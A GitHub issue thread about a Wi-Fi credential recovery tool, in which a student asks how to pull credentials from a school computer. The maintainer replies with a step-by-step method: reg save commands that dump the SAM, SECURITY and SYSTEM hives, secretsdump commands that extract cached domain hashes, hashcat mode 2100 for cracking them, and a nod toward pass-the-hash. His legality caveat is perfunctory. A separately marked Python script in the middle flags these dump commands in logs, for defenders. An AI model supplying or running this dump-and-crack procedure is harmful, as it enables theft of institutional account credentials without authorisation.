ash47 / EnterpriseWifiPasswordRecover

This is a tool that recovers WPA2 Enterprise Wifi Credentials from a machine.

Gets credentials but with an ethernet connection #16

Open Ardumine opened 1 year ago

Ardumine commented 1 year ago

Hi! First of all, I'm really happy for this project to exist! I was able to use this on my laptop and I got the school Wi-Fi auth with no problem! But there is just one thing. How can I use this instead of a Wi-Fi connection, with an ethernet connection? What I'm trying to say is that this program gets the credentials from the Wi-Fi saved on the laptop, but I need it to get the credentials on an ethernet connection, in this case a school computer where I have Admin access. Is this possible?

Thanks, and sorry for my bad English :)

ash47 commented 1 year ago

Hi,

(I'll assume this is legal and for educational purposes, etc, etc)

The older the version of Windows, the better your chances of success.

You're getting into the realm of pen testing now.

Domain credentials are stored in SAM / SECURITY / SYSTEM files.

You can dump those files with an elevated command prompt:

reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"

Copy those files off the PC; they contain the cached domain credentials. You'll need to extract them and then crack them.

Offline dumping of LSA secrets from exported hives

secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

Offline dumping of SAM secrets from exported hives

secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL

Offline dumping of SAM & LSA secrets from exported hives

secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

Secrets dump script: https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

You're looking for something like

$DCC2$10240#user#_hash_here

In the LSA secrets, the same secrets will be local account hashes.

You want to crack the hash with mode 2100 with hashcat:

https://hashcat.net/wiki/doku.php?id=example_hashes

There's enough info here to Google the rest.

Best of luck with your legal and educational projects.

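A defender-side view of the `reg save` commands in the comment above, as an added example that is not part of the thread or the project: it scans process-creation command lines for saves of the SAM, SECURITY and SYSTEM hives and rates each host. The `host|user|command line` log format, the sample rows and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches "reg save" / "reg.exe export" aimed at the root of the SAM, SECURITY
# or SYSTEM hive (HKLM or HKEY_LOCAL_MACHINE spelling, any case). Subkeys such
# as HKLM\SYSTEM\CurrentControlSet are deliberately not matched.
HIVE_DUMP = re.compile(
    r'\breg(?:\.exe)?"?\s+(?:save|export)\s+"?'
    r'(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SECURITY|SYSTEM)(?=["\s]|$)',
    re.IGNORECASE,
)

# Constructed sample rows in an assumed "host|user|command line" export of
# process-creation events with command-line auditing on. Not real telemetry.
SAMPLE_EVENTS = r'''
PC-LAB-07|labadmin|reg save HKLM\SAM "C:\Windows\Temp\sam.save"
PC-LAB-07|labadmin|reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
PC-LAB-07|labadmin|reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
PC-LAB-09|svc_backup|REG.EXE export HKEY_LOCAL_MACHINE\SYSTEM D:\bk\system.reg
PC-LAB-11|alice|reg query HKLM\SOFTWARE\Microsoft\Windows /v Version
PC-LAB-11|alice|reg save HKLM\SOFTWARE\Vendor C:\tmp\vendor.save
'''

def find_hive_dumps(log_text):
    """Return {host: set of hive names} for every matching command line."""
    hits = defaultdict(set)
    for line in log_text.strip().splitlines():
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue  # skip malformed rows
        host, _user, cmdline = parts
        match = HIVE_DUMP.search(cmdline)
        if match:
            hits[host].add(match.group(1).upper())
    return dict(hits)

def triage(hits):
    """SYSTEM carries the boot key that decrypts SAM and SECURITY, so SYSTEM
    plus either of those on one host is the complete set: rate it high."""
    result = {}
    for host, hives in hits.items():
        complete = "SYSTEM" in hives and hives & {"SAM", "SECURITY"}
        result[host] = "high" if complete else "review"
    return result

if __name__ == "__main__":
    for host, level in sorted(triage(find_hive_dumps(SAMPLE_EVENTS)).items()):
        print(host, level)
```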

Ardumine commented 8 months ago

Hi! Sorry for the late response! After having the $DCC2$10240#user#_hash_here, can I import it directly to my computer without cracking the hash? Btw, thanks for the response!

ash47 commented 8 months ago

I don't recall what kind of hash that is so I can't comment on it, but yeah, what you're asking about is similar to "pass the hash", and depending on what kind of hash it is, you can for sure just load it into your computer.

I'm not sure what kind of hash this is though anymore.
